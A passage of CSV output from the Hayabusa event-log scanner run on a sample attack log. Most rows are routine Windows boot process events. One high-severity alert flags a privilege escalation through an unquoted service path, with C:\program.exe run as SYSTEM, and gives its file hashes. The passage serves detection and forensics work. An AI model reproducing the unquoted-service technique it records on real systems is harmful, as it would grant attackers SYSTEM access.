AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 584 | PGUID: 747F3D96-B764-5EA4-0000-00106F550000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 616 | PGUID: 747F3D96-B764-5EA4-0000-001075590000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 732 | PGUID: 747F3D96-B764-5EA4-0000-00105B6C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 808 | PGUID: 747F3D96-B764-5EA4-0000-0010FE6F0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 992 | PGUID: 
747F3D96-B764-5EA4-0000-0010DEBF0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""dwm.exe"" | Process: C:\Windows\System32\dwm.exe | User: Window Manager\DWM-1 | Parent Cmd: winlogon.exe | LID: 0xbff6 | PID: 1000 | PGUID: 747F3D96-B764-5EA4-0000-001035C00000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1020 | PGUID: 747F3D96-B764-5EA4-0000-00105FC20000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 636 | PGUID: 747F3D96-B764-5EA4-0000-0010EAC90000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1104 | PGUID: 747F3D96-B764-5EA4-0000-0010A5D20000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 747F3D96-B765-5EA4-0000-001032D70000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1212 | PGUID: 747F3D96-B765-5EA4-0000-001089DD0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1240 | PGUID: 747F3D96-B765-5EA4-0000-0010DCDF0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1308 | PGUID: 747F3D96-B765-5EA4-0000-00109FE80000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 
07:19:25.603 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1360 | PGUID: 747F3D96-B765-5EA4-0000-00104FEE0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 | Process: C:\Windows\System32\upfc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1380 | PGUID: 747F3D96-B765-5EA4-0000-00107DF10000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1500 | PGUID: 747F3D96-B765-5EA4-0000-0010EDFC0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1536 | PGUID: 747F3D96-B765-5EA4-0000-001055010100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.536 
+09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1616 | PGUID: 747F3D96-B765-5EA4-0000-0010550A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1624 | PGUID: 747F3D96-B765-5EA4-0000-00108B0A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1640 | PGUID: 747F3D96-B765-5EA4-0000-0010EA0A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1676 | PGUID: 747F3D96-B765-5EA4-0000-00102B0F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1780 | PGUID: 747F3D96-B765-5EA4-0000-001028190100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dxgiadaptercache.exe | Process: C:\Windows\System32\dxgiadaptercache.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1876 | PGUID: 747F3D96-B765-5EA4-0000-0010831F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1912 | PGUID: 747F3D96-B765-5EA4-0000-00109B240100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1920 | PGUID: 747F3D96-B765-5EA4-0000-001031250100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k 
LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1936 | PGUID: 747F3D96-B765-5EA4-0000-0010BE260100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1996 | PGUID: 747F3D96-B765-5EA4-0000-0010572D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1440 | PGUID: 747F3D96-B765-5EA4-0000-00107A380100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1552 | PGUID: 747F3D96-B765-5EA4-0000-00100B390100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k 
LocalServiceNoNetworkFirewall -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2076 | PGUID: 747F3D96-B765-5EA4-0000-0010AA430100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.481 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20200425_221917_750.etl | Process: C:\Windows\System32\svchost.exe | PID: 2056 | PGUID: 747F3D96-B765-5EA4-0000-00106B420100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2204 | PGUID: 747F3D96-B765-5EA4-0000-0010344D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2364 | PGUID: 747F3D96-B765-5EA4-0000-001016620100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | Process: C:\Windows\System32\svchost.exe | User: NT 
AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2408 | PGUID: 747F3D96-B766-5EA4-0000-0010C4680100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2476 | PGUID: 747F3D96-B766-5EA4-0000-0010366F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2488 | PGUID: 747F3D96-B766-5EA4-0000-001019700100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2496 | PGUID: 747F3D96-B766-5EA4-0000-001046700100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: 
C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2632 | PGUID: 747F3D96-B766-5EA4-0000-0010A4790100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k utcsvc -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2640 | PGUID: 747F3D96-B766-5EA4-0000-0010067A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2704 | PGUID: 747F3D96-B766-5EA4-0000-0010DE7E0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2736 | PGUID: 747F3D96-B766-5EA4-0000-0010A7800100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2772 | PGUID: 
747F3D96-B766-5EA4-0000-001074830100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2848 | PGUID: 747F3D96-B766-5EA4-0000-0010D4880100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - Potential Unquoted Service Exploit | Cmd: c:\Program Files\vulnsvc\mmm.exe | Process: C:\program.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2856 | PGUID: 747F3D96-B766-5EA4-0000-0010E7880100 | Hash: SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,medium,Evas,Renamed Binary,,rules/sigma/process_creation/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2876 | PGUID: 
747F3D96-B766-5EA4-0000-0010038A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2900 | PGUID: 747F3D96-B766-5EA4-0000-00104A8D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3044 | PGUID: 747F3D96-B766-5EA4-0000-0010BAA10100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: sihost.exe | Process: C:\Windows\System32\sihost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | LID: 0x1d39b | PID: 3752 | PGUID: 747F3D96-B767-5EA4-0000-0010FE2E0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3760 | PGUID: 
747F3D96-B767-5EA4-0000-0010D0310200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3820 | PGUID: 747F3D96-B767-5EA4-0000-001097430200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4264 | PGUID: 747F3D96-B768-5EA4-0000-00106FAE0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: winlogon.exe | LID: 0x1d39b | PID: 